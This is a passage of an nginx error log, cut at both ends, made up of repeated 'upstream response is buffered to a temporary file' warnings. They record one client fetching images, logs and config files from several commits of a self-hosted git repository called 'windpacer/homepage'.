"http://192.168.0.250:3000/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom1.png", host: "git.hanmocnn.co.kr" -2026/02/15 14:27:02 [warn] 833#833: *21853 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/70/0000004700 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom6.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom6.png", host: "git.hanmocnn.co.kr" -2026/02/15 14:27:03 [warn] 833#833: *21853 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/70/0000004701 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom5.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom5.png", host: "git.hanmocnn.co.kr" -2026/02/15 14:27:10 [warn] 833#833: *21889 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/70/0000004702 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom6.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom6.png", host: "git.hanmocnn.co.kr" -2026/02/15 14:27:10 [warn] 833#833: *21889 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/70/0000004703 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom1.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom1.png", host: "git.hanmocnn.co.kr" -2026/02/15 14:27:11 [warn] 833#833: *21889 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/70/0000004704 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr" -2026/02/15 14:27:12 [warn] 833#833: *21889 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/70/0000004705 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr" -2026/02/15 14:27:12 [warn] 833#833: *21889 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/70/0000004706 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/commit/90c7377285c0e63de46467557a2f081b33097f03?style=split&whitespace=ignore-change HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/commit/90c7377285c0e63de46467557a2f081b33097f03?style=split&whitespace=ignore-change", host: "git.hanmocnn.co.kr" -2026/02/15 14:28:06 [warn] 834#834: *21958 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/70/0000004707 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-1_access.log HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-1_access.log", host: "git.hanmocnn.co.kr" -2026/02/15 14:28:13 [warn] 834#834: *21993 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/70/0000004708 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom4.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom4.png", host: "git.hanmocnn.co.kr" -2026/02/15 14:28:14 [warn] 834#834: *21993 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/70/0000004709 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/favicon.ico HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/favicon.ico", host: "git.hanmocnn.co.kr" -2026/02/15 14:28:14 [warn] 834#834: *21993 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/71/0000004710 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr" -2026/02/15 14:28:15 [warn] 834#834: *21993 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/71/0000004711 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/dcsintegration.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/dcsintegration.png", host: "git.hanmocnn.co.kr" -2026/02/15 14:28:25 [warn] 834#834: *22026 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/71/0000004712 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom1.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom1.png", host: "git.hanmocnn.co.kr" -2026/02/15 14:28:25 [warn] 834#834: *22026 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/71/0000004713 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom6.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom6.png", host: "git.hanmocnn.co.kr" -2026/02/15 14:28:26 [warn] 834#834: *22026 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/71/0000004714 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom5.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom5.png", host: "git.hanmocnn.co.kr" -2026/02/15 14:30:24 [warn] 832#832: *22185 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/71/0000004715 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom5.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom5.png", host: "git.hanmocnn.co.kr" -2026/02/15 14:30:24 [warn] 829#829: *22182 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/71/0000004716 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom4.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom4.png", host: "git.hanmocnn.co.kr" -2026/02/15 14:30:25 [warn] 829#829: *22182 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/71/0000004717 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr" -2026/02/15 14:30:50 [warn] 827#827: *22209 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/71/0000004718 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom1.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom1.png", host: "git.hanmocnn.co.kr" -2026/02/15 14:30:50 [warn] 827#827: *22209 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/71/0000004719 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom6.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom6.png", host: "git.hanmocnn.co.kr" -2026/02/15 14:32:06 [warn] 829#829: *22307 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/72/0000004720 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr" -2026/02/15 14:32:06 [warn] 829#829: *22307 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/72/0000004721 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr" -2026/02/15 14:32:06 [warn] 829#829: *22307 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/72/0000004722 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom5.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom5.png", host: "git.hanmocnn.co.kr" -2026/02/15 14:32:06 [warn] 829#829: *22307 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/72/0000004723 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom4.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom4.png", host: "git.hanmocnn.co.kr" -2026/02/15 14:32:08 [warn] 829#829: *22307 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/72/0000004724 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?files=html%2Fassets%2Fimages%2Fdcsintegration.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?files=html%2Fassets%2Fimages%2Fdcsintegration.png", host: "git.hanmocnn.co.kr" -2026/02/15 14:35:47 [warn] 833#833: *22453 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/72/0000004725 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr" -2026/02/15 15:31:51 [warn] 829#829: *22652 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/72/0000004726 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr" -2026/02/15 15:32:21 [warn] 829#829: *22667 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/72/0000004727 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr" -2026/02/15 15:32:21 [warn] 829#829: *22667 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/72/0000004728 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom4.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom4.png", host: "git.hanmocnn.co.kr" -2026/02/15 15:32:32 [warn] 829#829: *22681 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/72/0000004729 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom1.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom1.png", host: "git.hanmocnn.co.kr" -2026/02/15 15:32:32 [warn] 829#829: *22681 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/73/0000004730 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom6.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom6.png", host: "git.hanmocnn.co.kr" -2026/02/15 15:32:32 [warn] 829#829: *22681 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/73/0000004731 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom5.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom5.png", host: "git.hanmocnn.co.kr" -2026/02/15 15:33:15 [warn] 832#832: *22698 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/73/0000004732 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom5.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom5.png", host: "git.hanmocnn.co.kr" -2026/02/15 15:33:15 [warn] 832#832: *22698 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/73/0000004733 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom4.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom4.png", host: "git.hanmocnn.co.kr" -2026/02/15 15:33:24 [warn] 832#832: *22715 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/73/0000004734 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom1.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom1.png", host: "git.hanmocnn.co.kr" -2026/02/15 15:33:25 [warn] 832#832: *22715 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/73/0000004735 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom6.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom6.png", host: "git.hanmocnn.co.kr" -2026/02/15 15:35:13 [warn] 833#833: *22860 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/73/0000004736 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr" -2026/02/15 15:35:13 [warn] 833#833: *22860 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/73/0000004737 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host/1.conf?display=source HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host/1.conf?display=source", host: "git.hanmocnn.co.kr" -2026/02/15 15:35:14 [warn] 833#833: *22860 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/73/0000004738 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.3 HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.3", host: "git.hanmocnn.co.kr" -2026/02/15 15:35:53 [warn] 833#833: *22891 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/73/0000004739 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom4.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom4.png", host: "git.hanmocnn.co.kr" -2026/02/15 15:35:54 [warn] 833#833: *22891 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/74/0000004740 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/commit/90c7377285c0e63de46467557a2f081b33097f03?files=html HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/commit/90c7377285c0e63de46467557a2f081b33097f03?files=html", host: "git.hanmocnn.co.kr" -2026/02/15 15:35:54 [warn] 833#833: *22891 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/74/0000004741 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/docker-compose.yml?display=source HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/docker-compose.yml?display=source", host: "git.hanmocnn.co.kr" -2026/02/15 15:35:54 [warn] 833#833: *22891 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/74/0000004742 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/index.tsx?display=source HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/index.tsx?display=source", host: "git.hanmocnn.co.kr" -2026/02/15 15:35:55 [warn] 833#833: *22891 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/74/0000004743 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.1 HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.1", host: "git.hanmocnn.co.kr" -2026/02/15 15:36:10 [warn] 833#833: *22924 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/74/0000004744 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom1.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom1.png", host: "git.hanmocnn.co.kr" -2026/02/15 15:36:10 [warn] 833#833: *22924 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/74/0000004745 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom6.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom6.png", host: "git.hanmocnn.co.kr" -2026/02/15 15:37:41 [warn] 831#831: *23050 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/74/0000004746 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "git.hanmocnn.co.kr" -2026/02/15 15:37:41 [warn] 831#831: *23050 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/74/0000004747 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/dcsintegration.png?auto=format&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/dcsintegration.png?auto=format&q=80&w=1000", host: "git.hanmocnn.co.kr" -2026/02/15 15:37:41 [warn] 831#831: *23050 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/74/0000004748 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/dcsintegration.png?auto=format&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/dcsintegration.png?auto=format&q=80&w=800", host: "git.hanmocnn.co.kr" -2026/02/15 15:37:41 [warn] 831#831: *23050 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/74/0000004749 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "git.hanmocnn.co.kr" -2026/02/15 15:38:50 [warn] 827#827: *23101 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/75/0000004750 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom5.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom5.png", host: "git.hanmocnn.co.kr" -2026/02/15 15:38:50 [warn] 827#827: *23101 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/75/0000004751 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom4.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom4.png", host: "git.hanmocnn.co.kr" -2026/02/15 15:39:41 [warn] 827#827: *23113 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/75/0000004752 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom1.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom1.png", host: "git.hanmocnn.co.kr" -2026/02/15 15:39:41 [warn] 827#827: *23113 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/75/0000004753 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom6.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom6.png", host: "git.hanmocnn.co.kr" -2026/02/15 15:41:13 [warn] 828#828: *23143 an upstream response is buffered to a temporary file 